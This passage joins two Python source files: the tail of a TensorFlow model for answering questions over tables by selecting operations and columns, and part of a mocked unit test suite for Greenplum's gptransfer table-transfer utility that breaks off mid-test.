curr_prob = curr_prob * tf.expand_dims((1 - sum_prob), 2)
curr_prob = curr_prob * tf.expand_dims(
tf.cast((1 - sum_prob) > 0.0, self.data_type), 2)
answer = tf.select(select_mask, curr_prob, answer)
sum_prob += tf.reduce_sum(curr_prob, 2)
return answer
def perform_operations(self, softmax, full_column_softmax, select,
prev_select_1, curr_pass):
#performs all the 15 operations. computes scalar output, lookup answer and row selector
column_softmax = tf.slice(full_column_softmax, [0, 0],
[self.batch_size, self.num_cols])
word_column_softmax = tf.slice(full_column_softmax, [0, self.num_cols],
[self.batch_size, self.num_word_cols])
init_max = self.compute_max_or_min(select, maxi=True)
init_min = self.compute_max_or_min(select, maxi=False)
#operations that are column independent
count = tf.reshape(tf.reduce_sum(select, 1), [self.batch_size, 1])
select_full_column_softmax = tf.tile(
tf.expand_dims(full_column_softmax, 2),
[1, 1, self.max_elements
]) #BS * (max_cols + max_word_cols) * max_elements
select_word_column_softmax = tf.tile(
tf.expand_dims(word_column_softmax, 2),
[1, 1, self.max_elements]) #BS * max_word_cols * max_elements
select_greater = tf.reduce_sum(
self.init_select_greater * select_full_column_softmax,
1) * self.batch_question_number_mask #BS * max_elements
select_lesser = tf.reduce_sum(
self.init_select_lesser * select_full_column_softmax,
1) * self.batch_question_number_mask #BS * max_elements
select_geq = tf.reduce_sum(
self.init_select_geq * select_full_column_softmax,
1) * self.batch_question_number_mask #BS * max_elements
select_leq = tf.reduce_sum(
self.init_select_leq * select_full_column_softmax,
1) * self.batch_question_number_mask #BS * max_elements
select_max = tf.reduce_sum(init_max * select_full_column_softmax,
1) #BS * max_elements
select_min = tf.reduce_sum(init_min * select_full_column_softmax,
1) #BS * max_elements
select_prev = tf.concat(1, [
tf.slice(select, [0, 1], [self.batch_size, self.max_elements - 1]),
tf.cast(tf.zeros([self.batch_size, 1]), self.data_type)
])
select_next = tf.concat(1, [
tf.cast(tf.zeros([self.batch_size, 1]), self.data_type), tf.slice(
select, [0, 0], [self.batch_size, self.max_elements - 1])
])
select_last_rs = self.compute_first_or_last(select, False)
select_first_rs = self.compute_first_or_last(select, True)
select_word_match = tf.reduce_sum(self.batch_exact_match *
select_full_column_softmax, 1)
select_group_by_max = tf.reduce_sum(self.batch_group_by_max *
select_full_column_softmax, 1)
length_content = 1
length_select = 13
length_print = 1
values = tf.concat(1, [count])
softmax_content = tf.slice(softmax, [0, 0],
[self.batch_size, length_content])
#compute scalar output
output = tf.reduce_sum(tf.mul(softmax_content, values), 1)
#compute lookup answer
softmax_print = tf.slice(softmax, [0, length_content + length_select],
[self.batch_size, length_print])
curr_print = select_full_column_softmax * tf.tile(
tf.expand_dims(select, 1),
[1, self.num_cols + self.num_word_cols, 1
]) #BS * max_cols * max_elements (conisders only column)
self.batch_lookup_answer = curr_print * tf.tile(
tf.expand_dims(softmax_print, 2),
[1, self.num_cols + self.num_word_cols, self.max_elements
]) #BS * max_cols * max_elements
self.batch_lookup_answer = self.batch_lookup_answer * self.select_full_mask
#compute row select
softmax_select = tf.slice(softmax, [0, length_content],
[self.batch_size, length_select])
select_lists = [
tf.expand_dims(select_prev, 1), tf.expand_dims(select_next, 1),
tf.expand_dims(select_first_rs, 1), tf.expand_dims(select_last_rs, 1),
tf.expand_dims(select_group_by_max, 1),
tf.expand_dims(select_greater, 1), tf.expand_dims(select_lesser, 1),
tf.expand_dims(select_geq, 1), tf.expand_dims(select_leq, 1),
tf.expand_dims(select_max, 1), tf.expand_dims(select_min, 1),
tf.expand_dims(select_word_match, 1),
tf.expand_dims(self.reset_select, 1)
]
select = tf.reduce_sum(
tf.tile(tf.expand_dims(softmax_select, 2), [1, 1, self.max_elements]) *
tf.concat(1, select_lists), 1)
select = select * self.select_whole_mask
return output, select
def one_pass(self, select, question_embedding, hidden_vectors, hprev,
prev_select_1, curr_pass):
#Performs one timestep which involves selecting an operation and a column
attention_vector = self.perform_attention(
hprev, hidden_vectors, self.question_length,
self.batch_question_attention_mask) #batch_size * embedding_dims
controller_vector = tf.nn.relu(
tf.matmul(hprev, self.params["controller_prev"]) + tf.matmul(
tf.concat(1, [question_embedding, attention_vector]), self.params[
"controller"]))
column_controller_vector = tf.nn.relu(
tf.matmul(hprev, self.params["column_controller_prev"]) + tf.matmul(
tf.concat(1, [question_embedding, attention_vector]), self.params[
"column_controller"]))
controller_vector = nn_utils.apply_dropout(
controller_vector, self.utility.FLAGS.dropout, self.mode)
self.operation_logits = tf.matmul(controller_vector,
tf.transpose(self.params_unit))
softmax = tf.nn.softmax(self.operation_logits)
soft_softmax = softmax
#compute column softmax: bs * max_columns
weighted_op_representation = tf.transpose(
tf.matmul(tf.transpose(self.params_unit), tf.transpose(softmax)))
column_controller_vector = tf.nn.relu(
tf.matmul(
tf.concat(1, [
column_controller_vector, weighted_op_representation
]), self.params["break_conditional"]))
full_column_softmax = self.compute_column_softmax(column_controller_vector,
curr_pass)
soft_column_softmax = full_column_softmax
if (self.mode == "test"):
full_column_softmax = self.make_hard_softmax(full_column_softmax)
softmax = self.make_hard_softmax(softmax)
output, select = self.perform_operations(softmax, full_column_softmax,
select, prev_select_1, curr_pass)
return output, select, softmax, soft_softmax, full_column_softmax, soft_column_softmax
def compute_lookup_error(self, val):
#computes lookup error.
cond = tf.equal(self.batch_print_answer, val)
inter = tf.select(
cond, self.init_print_error,
tf.tile(
tf.reshape(tf.constant(1e10, self.data_type), [1, 1, 1]), [
self.batch_size, self.utility.FLAGS.max_word_cols +
self.utility.FLAGS.max_number_cols,
self.utility.FLAGS.max_elements
]))
return tf.reduce_min(tf.reduce_min(inter, 1), 1) * tf.cast(
tf.greater(
tf.reduce_sum(tf.reduce_sum(tf.cast(cond, self.data_type), 1), 1),
0.0), self.data_type)
def soft_min(self, x, y):
return tf.maximum(-1.0 * (1 / (
self.utility.FLAGS.soft_min_value + 0.0)) * tf.log(
tf.exp(-self.utility.FLAGS.soft_min_value * x) + tf.exp(
-self.utility.FLAGS.soft_min_value * y)), tf.zeros_like(x))
def error_computation(self):
#computes the error of each example in a batch
math_error = 0.5 * tf.square(tf.sub(self.scalar_output, self.batch_answer))
#scale math error
math_error = math_error / self.rows
math_error = tf.minimum(math_error, self.utility.FLAGS.max_math_error *
tf.ones(tf.shape(math_error), self.data_type))
self.init_print_error = tf.select(
self.batch_gold_select, -1 * tf.log(self.batch_lookup_answer + 1e-300 +
self.invert_select_full_mask), -1 *
tf.log(1 - self.batch_lookup_answer)) * self.select_full_mask
print_error_1 = self.init_print_error * tf.cast(
tf.equal(self.batch_print_answer, 0.0), self.data_type)
print_error = tf.reduce_sum(tf.reduce_sum((print_error_1), 1), 1)
for val in range(1, 58):
print_error += self.compute_lookup_error(val + 0.0)
print_error = print_error * self.utility.FLAGS.print_cost / self.num_entries
if (self.mode == "train"):
error = tf.select(
tf.logical_and(
tf.not_equal(self.batch_answer, 0.0),
tf.not_equal(
tf.reduce_sum(tf.reduce_sum(self.batch_print_answer, 1), 1),
0.0)),
self.soft_min(math_error, print_error),
tf.select(
tf.not_equal(self.batch_answer, 0.0), math_error, print_error))
else:
error = tf.select(
tf.logical_and(
tf.equal(self.scalar_output, 0.0),
tf.equal(
tf.reduce_sum(tf.reduce_sum(self.batch_lookup_answer, 1), 1),
0.0)),
tf.ones_like(math_error),
tf.select(
tf.equal(self.scalar_output, 0.0), print_error, math_error))
return error
def batch_process(self):
#Computes loss and fraction of correct examples in a batch.
self.params_unit = nn_utils.apply_dropout(
self.params["unit"], self.utility.FLAGS.dropout, self.mode)
batch_size = self.batch_size
max_passes = self.max_passes
num_timesteps = 1
max_elements = self.max_elements
select = tf.cast(
tf.fill([self.batch_size, max_elements], 1.0), self.data_type)
hprev = tf.cast(
tf.fill([self.batch_size, self.embedding_dims], 0.0),
self.data_type) #running sum of the hidden states of the model
output = tf.cast(tf.fill([self.batch_size, 1], 0.0),
self.data_type) #output of the model
correct = tf.cast(
tf.fill([1], 0.0), self.data_type
) #to compute accuracy, returns number of correct examples for this batch
total_error = 0.0
prev_select_1 = tf.zeros_like(select)
self.create_summary_embeddings()
self.get_column_hidden_vectors()
#get question embedding
question_embedding, hidden_vectors = self.LSTM_question_embedding(
self.batch_question, self.question_length)
#compute arguments for comparison operation
greater_question_number, lesser_question_number, geq_question_number, leq_question_number = self.question_number_softmax(
hidden_vectors)
self.init_select_greater = tf.cast(
tf.greater(self.full_processed_column,
tf.expand_dims(greater_question_number, 2)), self.
data_type) * self.select_bad_number_mask #bs * max_cols * max_elements
self.init_select_lesser = tf.cast(
tf.less(self.full_processed_column,
tf.expand_dims(lesser_question_number, 2)), self.
data_type) * self.select_bad_number_mask #bs * max_cols * max_elements
self.init_select_geq = tf.cast(
tf.greater_equal(self.full_processed_column,
tf.expand_dims(geq_question_number, 2)), self.
data_type) * self.select_bad_number_mask #bs * max_cols * max_elements
self.init_select_leq = tf.cast(
tf.less_equal(self.full_processed_column,
tf.expand_dims(leq_question_number, 2)), self.
data_type) * self.select_bad_number_mask #bs * max_cols * max_elements
self.init_select_word_match = 0
if (self.utility.FLAGS.rnn_dropout > 0.0):
if (self.mode == "train"):
history_rnn_dropout_mask = tf.cast(
tf.random_uniform(
tf.shape(hprev), minval=0.0, maxval=1.0) <
self.utility.FLAGS.rnn_dropout,
self.data_type) / self.utility.FLAGS.rnn_dropout
else:
history_rnn_dropout_mask = tf.ones_like(hprev)
select = select * self.select_whole_mask
self.batch_log_prob = tf.zeros([self.batch_size], dtype=self.data_type)
#Perform max_passes and at each pass select operation and column
for curr_pass in range(max_passes):
print "step: ", curr_pass
output, select, softmax, soft_softmax, column_softmax, soft_column_softmax = self.one_pass(
select, question_embedding, hidden_vectors, hprev, prev_select_1,
curr_pass)
prev_select_1 = select
#compute input to history RNN
input_op = tf.transpose(
tf.matmul(
tf.transpose(self.params_unit), tf.transpose(
soft_softmax))) #weighted average of emebdding of operations
input_col = tf.reduce_sum(
tf.expand_dims(soft_column_softmax, 2) *
self.full_column_hidden_vectors, 1)
history_input = tf.concat(1, [input_op, input_col])
history_input = nn_utils.apply_dropout(
history_input, self.utility.FLAGS.dropout, self.mode)
hprev = self.history_recurrent_step(history_input, hprev)
if (self.utility.FLAGS.rnn_dropout > 0.0):
hprev = hprev * history_rnn_dropout_mask
self.scalar_output = output
error = self.error_computation()
cond = tf.less(error, 0.0001, name="cond")
correct_add = tf.select(
cond, tf.fill(tf.shape(cond), 1.0), tf.fill(tf.shape(cond), 0.0))
correct = tf.reduce_sum(correct_add)
error = error / batch_size
total_error = tf.reduce_sum(error)
total_correct = correct / batch_size
return total_error, total_correct
def compute_error(self):
#Sets mask variables and performs batch processing
self.batch_gold_select = self.batch_print_answer > 0.0
self.full_column_mask = tf.concat(
1, [self.batch_number_column_mask, self.batch_word_column_mask])
self.full_processed_column = tf.concat(
1,
[self.batch_processed_number_column, self.batch_processed_word_column])
self.full_processed_sorted_index_column = tf.concat(1, [
self.batch_processed_sorted_index_number_column,
self.batch_processed_sorted_index_word_column
])
self.select_bad_number_mask = tf.cast(
tf.logical_and(
tf.not_equal(self.full_processed_column,
self.utility.FLAGS.pad_int),
tf.not_equal(self.full_processed_column,
self.utility.FLAGS.bad_number_pre_process)),
self.data_type)
self.select_mask = tf.cast(
tf.logical_not(
tf.equal(self.batch_number_column, self.utility.FLAGS.pad_int)),
self.data_type)
self.select_word_mask = tf.cast(
tf.logical_not(
tf.equal(self.batch_word_column_entry_mask,
self.utility.dummy_token_id)), self.data_type)
self.select_full_mask = tf.concat(
1, [self.select_mask, self.select_word_mask])
self.select_whole_mask = tf.maximum(
tf.reshape(
tf.slice(self.select_mask, [0, 0, 0],
[self.batch_size, 1, self.max_elements]),
[self.batch_size, self.max_elements]),
tf.reshape(
tf.slice(self.select_word_mask, [0, 0, 0],
[self.batch_size, 1, self.max_elements]),
[self.batch_size, self.max_elements]))
self.invert_select_full_mask = tf.cast(
tf.concat(1, [
tf.equal(self.batch_number_column, self.utility.FLAGS.pad_int),
tf.equal(self.batch_word_column_entry_mask,
self.utility.dummy_token_id)
]), self.data_type)
self.batch_lookup_answer = tf.zeros(tf.shape(self.batch_gold_select))
self.reset_select = self.select_whole_mask
self.rows = tf.reduce_sum(self.select_whole_mask, 1)
self.num_entries = tf.reshape(
tf.reduce_sum(tf.reduce_sum(self.select_full_mask, 1), 1),
[self.batch_size])
self.final_error, self.final_correct = self.batch_process()
return self.final_error
def create_graph(self, params, global_step):
#Creates the graph to compute error, gradient computation and updates parameters
self.params = params
batch_size = self.batch_size
learning_rate = tf.cast(self.utility.FLAGS.learning_rate, self.data_type)
self.total_cost = self.compute_error()
optimize_params = self.params.values()
optimize_names = self.params.keys()
print "optimize params ", optimize_names
if (self.utility.FLAGS.l2_regularizer > 0.0):
reg_cost = 0.0
for ind_param in self.params.keys():
reg_cost += tf.nn.l2_loss(self.params[ind_param])
self.total_cost += self.utility.FLAGS.l2_regularizer * reg_cost
grads = tf.gradients(self.total_cost, optimize_params, name="gradients")
grad_norm = 0.0
for p, name in zip(grads, optimize_names):
print "grads: ", p, name
if isinstance(p, tf.IndexedSlices):
grad_norm += tf.reduce_sum(p.values * p.values)
elif not (p == None):
grad_norm += tf.reduce_sum(p * p)
grad_norm = tf.sqrt(grad_norm)
max_grad_norm = np.float32(self.utility.FLAGS.clip_gradients).astype(
self.utility.np_data_type[self.utility.FLAGS.data_type])
grad_scale = tf.minimum(
tf.cast(1.0, self.data_type), max_grad_norm / grad_norm)
clipped_grads = list()
for p in grads:
if isinstance(p, tf.IndexedSlices):
tmp = p.values * grad_scale
clipped_grads.append(tf.IndexedSlices(tmp, p.indices))
elif not (p == None):
clipped_grads.append(p * grad_scale)
else:
clipped_grads.append(p)
grads = clipped_grads
self.global_step = global_step
params_list = self.params.values()
params_list.append(self.global_step)
adam = tf.train.AdamOptimizer(
learning_rate,
epsilon=tf.cast(self.utility.FLAGS.eps, self.data_type),
use_locking=True)
self.step = adam.apply_gradients(zip(grads, optimize_params),
global_step=self.global_step)
self.init_op = tf.initialize_all_variables()
|
|
import imp
import os
import re
import tempfile
import shutil
from mock import *
from gp_unittest import *
from gparray import GpDB, GpArray
from gppylib.db.dbconn import UnexpectedRowsError
from pygresql import pgdb
from gppylib.operations.backup_utils import escapeDoubleQuoteInSQLString
cursor_keys = dict(
normal_tables=re.compile(".*n\.nspname, c\.relname, c\.relstorage.*c\.oid NOT IN \( SELECT parchildrelid.*"),
partition_tables=re.compile(".*n\.nspname, c\.relname, c\.relstorage(?!.*SELECT parchildrelid).*"),
relations=re.compile(".*select relname from pg_class r.*"),
table_info=re.compile(".*select is_nullable, data_type, character_maximum_length,.*"),
partition_info=re.compile(".*select parkind, parlevel, parnatts, paratts.*"),
schema_name=re.compile(".*SELECT fsname FROM pg_catalog.pg_filespace.*"),
create_schema=re.compile(".*CREATE SCHEMA.*"),
ordinal_pos=re.compile(".*select ordinal_position from.*"),
attname=re.compile(".*SELECT attname.*"),
)
class GpTransfer(GpTestCase):
TEMP_DIR = "/tmp/test_unit_gptransfer"
def setUp(self):
if not os.path.exists(self.TEMP_DIR):
os.makedirs(self.TEMP_DIR)
# because gptransfer does not have a .py extension,
# we have to use imp to import it
# if we had a gptransfer.py, this is equivalent to:
# import gptransfer
# self.subject = gptransfer
gptransfer_file = os.path.abspath(os.path.dirname(__file__) + "/../../../gptransfer")
self.subject = imp.load_source('gptransfer', gptransfer_file)
self.subject.logger = Mock(spec=['log', 'warn', 'info', 'debug', 'error', 'warning'])
self.gparray = self.createGpArrayWith2Primary2Mirrors()
self.db_connection = MagicMock()
# TODO: We should be using a spec here, but I haven't been able to narrow down exactly which call is causing an attribute error when using the spec.
# The error is occuring because we don't mock out every possible SQL command, and some get swallowed (which is fine so far), but to fully support specs
# we need to go through and mock all the SQL calls
# self.db_connection = MagicMock(spec=["__exit__", "close", "__enter__", "commit", "rollback"])
self.cursor = MagicMock(spec=pgdb.pgdbCursor)
self.db_singleton = Mock()
self.workerpool = MagicMock()
self.workerpool.work_queue.qsize.return_value = 0
self.apply_patches([
patch('os.environ', new={"GPHOME": "my_gp_home"}),
patch('gppylib.operations.dump.GpArray.initFromCatalog', return_value=self.gparray),
patch('gptransfer.connect', return_value=self.db_connection),
patch('gptransfer.getUserDatabaseList', return_value=[["my_first_database"], ["my_second_database"]]),
patch('gppylib.db.dbconn.connect', return_value=self.db_connection),
patch('gptransfer.WorkerPool', return_value=self.workerpool),
patch('gptransfer.doesSchemaExist', return_value=False),
patch('gptransfer.dropSchemaIfExist'),
patch('gptransfer.execSQL', new=self.cursor),
patch('gptransfer.execSQLForSingletonRow', new=self.db_singleton),
patch("gppylib.commands.unix.FileDirExists.remote", return_value=True),
patch("gptransfer.wait_for_pool", return_value=([], [])),
patch("gptransfer.escapeDoubleQuoteInSQLString"),
])
# We have a GIGANTIC class that uses 31 arguments, so pre-setting this
# here
self.GpTransferCommand_args = dict(
name='foo',
src_host='foo',
src_port='foo',
src_user='foo',
dest_host='foo',
dest_port='foo',
dest_user='foo',
table_pair='foo',
dest_exists='foo',
truncate='foo',
analyze='foo',
drop='foo',
fast_mode='foo',
exclusive_lock='foo',
schema_only='foo',
work_dir='foo',
host_map='foo',
source_config='foo',
batch_size='foo',
gpfdist_port='foo',
gpfdist_last_port='foo',
gpfdist_instance_count='foo',
max_line_length='foo',
timeout='foo',
wait_time='foo',
delimiter='foo',
validator='foo',
format='foo',
quote='foo',
table_transfer_set_total='foo')
self.GpTransfer_options_defaults = dict(
analyze=False,
base_port=8000,
batch_size=2,
databases=[],
delimiter=',',
dest_database=None,
dest_host='127.0.0.1',
dest_port=5432,
dest_user='gpadmin',
drop=False,
dry_run=False,
enable_test=False,
exclude_input_file=None,
exclude_tables=[],
exclusive_lock=False,
force_standard_mode=False,
format='CSV',
full=False,
input_file=None,
interactive=False,
last_port=-1,
logfileDirectory=None,
max_gpfdist_instances=1,
max_line_length=10485760,
no_final_count_validation=False,
partition_transfer=False,
partition_transfer_non_pt_target=False,
quiet=None,
quote='\x01',
schema_only=False,
skip_existing=False,
source_host='127.0.0.1',
source_map_file=None,
source_port=5432,
source_user='gpadmin',
sub_batch_size=25,
tables=[],
timeout=300,
truncate=False,
validator=None,
verbose=None,
wait_time=3,
work_base_dir='/home/gpadmin/',
)
def tearDown(self):
shutil.rmtree(self.TEMP_DIR)
@patch('gptransfer.TableValidatorFactory', return_value=Mock())
def test__get_distributed_by_quotes_column_name(self, mock1):
gptransfer = self.subject
cmd_args = self.GpTransferCommand_args
src_args = ('src', 'public', 'foo', False)
dest_args = ('dest', 'public', 'foo', False)
source_table = gptransfer.GpTransferTable(*src_args)
dest_table = gptransfer.GpTransferTable(*dest_args)
cmd_args['table_pair'] = gptransfer.GpTransferTablePair(source_table, dest_table)
side_effect = CursorSideEffect()
side_effect.append_regexp_key(cursor_keys['attname'], ['foo'])
self.cursor.side_effect = side_effect.cursor_side_effect
self.subject.escapeDoubleQuoteInSQLString.return_value='"escaped_string"'
table_validator = gptransfer.GpTransferCommand(**cmd_args)
expected_distribution = '''DISTRIBUTED BY ("escaped_string")'''
self.assertEqual(expected_distribution, table_validator._get_distributed_by())
@patch('gptransfer.TableValidatorFactory', return_value=Mock())
def test__get_distributed_by_quotes_multiple_column_names(self, mock1):
gptransfer = self.subject
cmd_args = self.GpTransferCommand_args
src_args = ('src', 'public', 'foo', False)
dest_args = ('dest', 'public', 'foo', False)
source_table = gptransfer.GpTransferTable(*src_args)
dest_table = gptransfer.GpTransferTable(*dest_args)
cmd_args['table_pair'] = gptransfer.GpTransferTablePair(source_table, dest_table)
side_effect = CursorSideEffect()
side_effect.append_regexp_key(cursor_keys['attname'], ['foo', 'bar'])
self.cursor.side_effect = side_effect.cursor_side_effect
self.subject.escapeDoubleQuoteInSQLString.side_effect = ['"first_escaped_value"', '"second_escaped_value"']
table_validator = gptransfer.GpTransferCommand(**cmd_args)
expected_distribution = '''DISTRIBUTED BY ("first_escaped_value", "second_escaped_value")'''
self.assertEqual(expected_distribution, table_validator._get_distributed_by())
@patch('gptransfer.TableValidatorFactory', return_value=Mock())
def test__get_distributed_randomly_when_no_distribution_keys(self, mock1):
side_effect = CursorSideEffect()
side_effect.append_regexp_key(cursor_keys['attname'], [])
self.cursor.side_effect = side_effect.cursor_side_effect
table_validator = self._get_gptransfer_command()
expected_distribution = '''DISTRIBUTED RANDOMLY'''
result_distribution = table_validator._get_distributed_by()
self.assertEqual(0, len(self.subject.logger.method_calls))
self.assertEqual(expected_distribution, result_distribution)
@patch('gptransfer.TableValidatorFactory', return_value=Mock())
def test_get_distributed_randomly_handles_exception(self, mock1):
self.cursor.side_effect = ""
table_validator = self._get_gptransfer_command()
expected_distribution = '''DISTRIBUTED RANDOMLY'''
result_distribution = table_validator._get_distributed_by()
self.assertEqual(1, len(self.subject.logger.method_calls))
self.assertEqual(expected_distribution, result_distribution)
def test__normal_transfer_no_tables_does_nothing_but_log(self):
options = self.setup_normal_to_normal_validation()
with open(options["input_file"], "w") as src_map_file:
src_map_file.write("my_first_database.public.nonexistent_table")
with self.assertRaises(SystemExit):
self.subject.GpTransfer(Mock(**options), [])
log_messages = self.get_info_messages()
self.assertIn("Found no tables to transfer.", log_messages[-1])
def test__normal_transfer_with_tables_validates(self):
options = self.setup_normal_to_normal_validation()
self.subject.GpTransfer(Mock(**options), [])
log_messages = self.get_info_messages()
self.assertIn("Validating transfer table set...", log_messages)
def test__normal_transfer_when_destination_table_already_exists_fails(self):
options = self.setup_normal_to_normal_validation()
additional = {
cursor_keys["normal_tables"]: [["public", "my_normal_table", ""]],
}
self.cursor.side_effect = CursorSideEffect(additional=additional).cursor_side_effect
with self.assertRaisesRegexp(Exception, "Table my_first_database.public.my_normal_table exists in database my_first_database"):
self.subject.GpTransfer(Mock(**options), [])
def test__normal_transfer_when_input_file_bad_format_comma_fails(self):
options = self.setup_normal_to_normal_validation()
with open(options["input_file"], "w") as src_map_file:
src_map_file.write("my_first_database.public.my_table, my_second_database.public.my_table")
self.cursor.side_effect = CursorSideEffect().cursor_side_effect
with self.assertRaisesRegexp(Exception, "Destination tables \(comma separated\) are only allowed for partition tables"):
self.subject.GpTransfer(Mock(**options), [])
@patch('gptransfer.CountTableValidator.accumulate', side_effect=Exception('BOOM'))
def test__final_count_validation_when_throws_should_raises_exception(self, mock1):
options = self.setup_normal_to_normal_validation()
with self.assertRaisesRegexp(Exception, "Final count validation failed"):
self.subject.GpTransfer(Mock(**options), []).run()
def test__final_count_invalid_one_src_one_dest_table_logs_error(self):
options = self.setup_normal_to_normal_validation()
additional = {
"SELECT count(*) FROM": [3]
}
self.db_singleton.side_effect = SingletonSideEffect(additional).singleton_side_effect
self.subject.GpTransfer(Mock(**options), []).run()
self.assertIn("Validation failed for %s", self.get_error_logging())
def test__partition_to_partition_final_count_invalid_one_src_one_dest_table_logs_warning(self):
options = self.setup_partition_validation()
additional = {
"SELECT count(*) FROM": [3]
}
self.db_singleton.side_effect = SingletonSideEffect(additional).singleton_side_effect
self.subject.GpTransfer(Mock(**options), []).run()
self.assertIn("Validation failed for %s", self.get_warnings())
def test__partition_to_partition_when_invalid_final_counts_should_warn(self):
options = self.setup_partition_validation()
with open(options["input_file"], "w") as src_map_file:
src_map_file.write(
"my_first_database.public.my_table_partition1, my_first_database.public.my_table_partition1\n"
"my_first_database.public.my_table_partition2")
additional = {
cursor_keys["partition_tables"]: [["public", "my_table_partition1", ""],
["public", "my_table_partition2", ""]],
}
cursor_side_effect = CursorSideEffect(additional=additional)
self.cursor.side_effect = cursor_side_effect.cursor_side_effect
multi = {
"SELECT count(*) FROM": [[12], [10]]
}
self.db_singleton.side_effect = SingletonSideEffect(multi_list=multi).singleton_side_effect
self.subject.GpTransfer(Mock(**options), []).run()
self.assertIn("Validation failed for %s", self.get_warnings())
def test__partition_to_partition_when_valid_final_counts_mult_src_same_dest_table_succeeds(self):
options = self.setup_partition_validation()
with open(options["input_file"], "w") as src_map_file:
src_map_file.write(
"my_first_database.public.my_table_partition1, my_first_database.public.my_table_partition1\n"
"my_first_database.public.my_table_partition2")
additional = {
cursor_keys["partition_tables"]: [["public", "my_table_partition1", ""],
["public", "my_table_partition2", ""]],
}
cursor_side_effect = CursorSideEffect(additional=additional)
self.cursor.side_effect = cursor_side_effect.cursor_side_effect
self.subject.GpTransfer(Mock(**options), []).run()
self.assertIn("Validation of %s successful", self.get_info_messages())
def test__partition_to_normal_table_succeeds(self):
options = self.setup_partition_to_normal_validation()
# simulate that dest normal table has 0 rows to begin with and 20 when finished
multi = {
"SELECT count(*) FROM": [[20], [0]]
}
self.db_singleton.side_effect = SingletonSideEffect(multi_list=multi).singleton_side_effect
self.subject.GpTransfer(Mock(**options), []).run()
self.assertNotIn("Validation failed for %s", self.get_warnings())
self.assertIn("Validation of %s successful", self.get_info_messages())
def test__final_count_validation_same_counts_src_dest_passes(self):
options = self.setup_normal_to_normal_validation()
self.subject.GpTransfer(Mock(**options), []).run()
self.assertIn("Validation of %s successful", self.get_info_messages())
def test__validates_good_partition(self):
options = self.setup_partition_validation()
self.subject.GpTransfer(Mock(**options), [])
self.assertIn("Validating partition table transfer set...", self.get_info_messages())
def test__partition_to_nonexistent_partition_fails(self):
options = self.setup_partition_validation()
with open(options["input_file"], "w") as src_map_file:
src_map_file.write(
"my_first_database.public.my_table_partition1, my_first_database.public.my_table_partition2")
self.cursor.side_effect = CursorSideEffect().cursor_side_effect
with self.assertRaisesRegexp(Exception, "does not exist in destination database when transferring from "
"partition tables .filtering for destination leaf partitions because "
"of option \"--partition-transfer\"."):
self.subject.GpTransfer(Mock(**options), [])
def test__partition_to_nonexistent_normal_table_fails(self):
options = self.setup_partition_to_normal_validation()
with open(options["input_file"], "w") as src_map_file:
src_map_file.write("my_first_database.public.my_table_partition1, my_first_database.public.does_not_exist")
self.cursor.side_effect = CursorSideEffect().cursor_side_effect
with self.assertRaisesRegexp(Exception, "does not exist in destination database when transferring from "
"partition tables .filtering for destination non-partition tables because "
"of option \"--partition-transfer-non-partition-target\"."):
self.subject.GpTransfer(Mock(**options), [])
def test__partition_to_multiple_same_partition_tables_fails(self):
options = self.setup_partition_validation()
with open(options["input_file"], "w") as src_map_file:
src_map_file.write(
"my_first_database.public.my_table_partition1\nmy_first_database.public.my_table_partition3, my_first_database.public.my_table_partition1")
cursor_side_effect = CursorSideEffect()
cursor_side_effect.first_values[cursor_keys["partition_tables"]] = [["public", "my_table_partition1", ""],
["public", "my_table_partition3", ""]]
self.cursor.side_effect = cursor_side_effect.cursor_side_effect
with self.assertRaisesRegexp(Exception, "Multiple tables map to"):
self.subject.GpTransfer(Mock(**options), [])
def test__partition_to_nonpartition_table_with_different_columns_fails(self):
options = self.setup_partition_to_normal_validation()
with open(options["input_file"], "w") as src_map_file:
src_map_file.write("my_first_database.public.my_table_partition1, my_first_database.public.my_normal_table")
additional = {
cursor_keys["normal_tables"]: [["public", "my_normal_table", ""]],
cursor_keys['table_info']: [
[1, "t", "my_new_data_type", 255, 16, 1024, 1024, 1, 1024, "my_interval_type", "my_udt_name"]],
}
cursor_side_effect = CursorSideEffect(additional=additional)
cursor_side_effect.first_values[cursor_keys["partition_tables"]] = [["public", "my_table_partition1", ""]]
self.cursor.side_effect = cursor_side_effect.cursor_side_effect
with self.assertRaisesRegexp(Exception, "has different column layout or types"):
self.subject.GpTransfer(Mock(**options), [])
def test__multiple_partitions_to_same_normal_table_succeeds(self):
options = self.setup_partition_to_normal_validation()
with open(options["input_file"], "w") as src_map_file:
src_map_file.write(
"my_first_database.public.my_table_partition1, my_first_database.public.my_normal_table\nmy_first_database.public.my_table_partition2, my_first_database.public.my_normal_table")
additional = {
cursor_keys["normal_tables"]: [["public", "my_normal_table", ""]],
}
cursor_side_effect = CursorSideEffect(additional=additional)
cursor_side_effect.first_values[cursor_keys["partition_tables"]] = [["public", "my_table_partition1", ""],
["public", "my_table_partition2", ""]]
self.cursor.side_effect = cursor_side_effect.cursor_side_effect
# call through to unmocked version of this function because the function gets called too many times
# to easily mock in this case
self.subject.escapeDoubleQuoteInSQLString = escapeDoubleQuoteInSQLString
class SingletonSideEffectWithIterativeReturns(SingletonSideEffect):
def __init__(self):
SingletonSideEffect.__init__(self)
self.values['SELECT count(*) FROM "public"."my_normal_table"'] = [[[30], [15], [15]]]
self.counters['SELECT count(*) FROM "public"."my_normal_table"'] = 0
def singleton_side_effect(self, *args):
for key in self.values.keys():
for arg in args:
if key in arg:
value_list = self.values[key]
result = value_list[self.counters[key] % len(value_list)]
if any(isinstance(i, list) for i in value_list):
result = result[self.counters[key] % len(value_list)]
self.counters[key] += 1
return result
return None
self.db_singleton.side_effect = SingletonSideEffectWithIterativeReturns().singleton_side_effect
self.subject.GpTransfer(Mock(**options), []).run()
self.assertNotIn("Validation failed for %s", self.get_warnings())
self.assertIn("Validation of %s successful", self.get_info_messages())
def test__validate_nonpartition_tables_with_truncate_fails(self):
options = self.setup_partition_to_normal_validation()
options.update(truncate=True)
with self.assertRaisesRegexp(Exception, "--truncate is not allowed with option --partition-transfer-non-partition-target"):
self.subject.GpTransfer(Mock(**options), [])
def test__validate_bad_partition_source_not_leaf_fails(self):
options = self.setup_partition_validation()
cursor_side_effect = CursorSideEffect()
cursor_side_effect.first_values[cursor_keys['relations']] = ["my_relname1", "my_relname2"]
self.cursor.side_effect = cursor_side_effect.cursor_side_effect
with self.assertRaisesRegexp(Exception, "Source table "):
self.subject.GpTransfer(Mock(**options), [])
def test__validate_partition_when_source_and_dest_have_different_column_count_fails(self):
options = self.setup_partition_validation()
additional = {
cursor_keys['table_info']: [
["t", "my_data_type", 255, 16, 1024, 1024, 1, 1024, "my_interval_type", "my_udt_name"],
